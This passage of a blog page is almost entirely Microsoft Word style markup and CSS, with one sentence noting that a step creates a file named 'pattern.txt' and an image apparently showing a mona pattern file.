UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> <br />
<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">This will create a file named “pattern.txt”.</div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-dWbtJC4CT7c/TgwlAlzDOOI/AAAAAAAAAVk/BYUNynYBPDw/s1600/mona-pattern-file.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="http://1.bp.blogspot.com/-dWbtJC4CT7c/TgwlAlzDOOI/AAAAAAAAAVk/BYUNynYBPDw/s400/mona-pattern-file.JPG" width="400" /></a></div><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
